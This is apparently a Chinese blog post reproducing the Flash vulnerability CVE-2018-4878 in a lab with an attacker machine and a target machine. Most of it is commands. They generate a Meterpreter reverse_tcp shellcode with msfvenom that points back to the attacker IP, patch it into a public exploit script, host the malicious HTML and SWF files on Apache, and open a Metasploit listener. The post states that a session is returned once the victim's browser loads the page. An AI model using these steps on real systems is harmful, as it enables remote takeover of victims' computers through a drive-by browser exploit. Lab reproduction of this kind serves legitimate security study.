zoukankan      html  css  js  c++  java
  • Flash 零日漏洞复现(CVE-2018-4878)

    项目地址:https://github.com/Sch01ar/CVE-2018-4878.git

    影响版本为:Adobe Flash Player <= 28.0.0.137

    攻击机器IP:192.168.220.152

    目标靶机:192.168.220.151,浏览器为360浏览器

    用msfvenom生成一个shellcode

    ┌─[root@sch01ar]─[~]
    └──╼ #msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.220.152 lport=6666 -f python>shellcode.txt
    

     获取shellcode.txt的内容

    ┌─[root@sch01ar]─[~]
    └──╼ #cat shellcode.txt
    

    把shellcode.txt里的内容替换cve-2018-4878.py中的shellcode内容

    运行exp

    ┌─[root@sch01ar]─[~/CVE-2018-4878]
    └──╼ #python cve-2018-4878.py
    

     把exploit.html和exploit.swf移到/var/www/html/下

    ┌─[root@sch01ar]─[~/CVE-2018-4878]
    └──╼ #cp exploit.swf /var/www/html/
    ┌─[root@sch01ar]─[~/CVE-2018-4878]
    └──╼ #cp exploit.html /var/www/html/
    

     开启apache2服务

    ┌─[root@sch01ar]─[~/CVE-2018-4878]
    └──╼ #service apache2 start
    

     开启msf

    ┌─[✗]─[root@sch01ar]─[~]
    └──╼ #msfconsole
    

     然后一系列的配置,开启监听

    msf > use exploit/multi/handler
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 192.168.220.152
    lhost => 192.168.220.152
    msf exploit(handler) > set lport 6666
    lport => 6666
    msf exploit(handler) > exploit -j
    

     

    用靶机的360浏览器打开地址:http://192.168.220.152/exploit.html

    msf会返回一个会话

    执行命令

  • 相关阅读:
    SQl语句学习笔记(二)
    Adaboost 算法
    降维PCA技术
    scanf 格式化字符串详解
    大小端模式和位域详解(转载)
    推荐系统开源软件列表汇总和点评(转载)
    遗传算法入门(转载)
    大白话解析模拟退火算法(转载)
    机器学习相关——协同过滤(转载)
    python面向对象之单例模式
  • 原文地址:https://www.cnblogs.com/sch01ar/p/8575441.html
Copyright © 2011-2022 走看看